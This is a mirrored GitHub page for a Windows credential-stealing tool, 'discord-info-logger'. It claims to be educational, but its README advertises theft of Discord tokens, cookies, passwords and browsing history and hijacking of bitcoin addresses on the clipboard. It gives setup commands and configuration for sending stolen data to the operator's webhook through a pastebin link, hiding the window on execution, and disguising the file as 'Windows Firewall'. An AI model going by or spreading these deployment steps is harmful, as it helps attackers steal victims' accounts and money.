Giter Site home page Giter Site logo

zhn9 / discord-info-logger Goto Github PK

View Code? Open in Web Editor NEW

This project forked from ramin245/discord-info-logger

0.0 0.0 0.0 119 KB

A free, efficient, and open-source discord token logger, that also grabs history, cookies, passwords, and intercepts bitcoin addresses. This is purely for demonstration/educational purposes.

Home Page: https://arshan.xyz

Python 100.00%

discord-info-logger's Introduction

Discord-Info-Logger

A free, efficient, and open-source discord token logger, that also grabs history, cookies, passwords, and intercepts bitcoin addresses. This is purely for demonstration/educational purposes.

Setup

Depending on your python installation your commands may vary. Below are the commands needed to set up. The script was tested in python 3.8.6, on windows 10. This script only works on windows.

Windows:

git clone https://github.com/LocalsGitHub/Discord-Info-Logger.git
cd Discord-Info-Logger
pip install -r requirements.txt
py TokenLogger.py

Config

Once you have opened the script in your desired text editor, there are 3 lines that you can change.

# Configuration
debugger = False <--- Change this if you are having any issues with the logger. It will print any errors.
BTC_ADDRESS = '3LsZH7LqxJMZBaVU9YoTLk8HNnUcmzE88v' <--- Change this to your own bitcoin address
pastebin = "https://pastebin.com/raw/id" <--- Change this to your own pastebin link that contains your webhook
hiddenWindow = False <--- Set this to True or False. If you want the window to be hidden on execution then set this to True
FakeFileName = "Windows Firewall" <--- Change this to the fake desired name.

Support

Create an issue, or message me on discord.

Credit

Credit to me for maintaining this project, adding the data logger, gofile upload, and fixing any bugs that arise, and small changes.
Credit to checksum (Github) for the token logger
Credit to NightFallGT (Github) for the BTC Clipper
Credit to anyone else who contributed :)

discord-info-logger's People

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.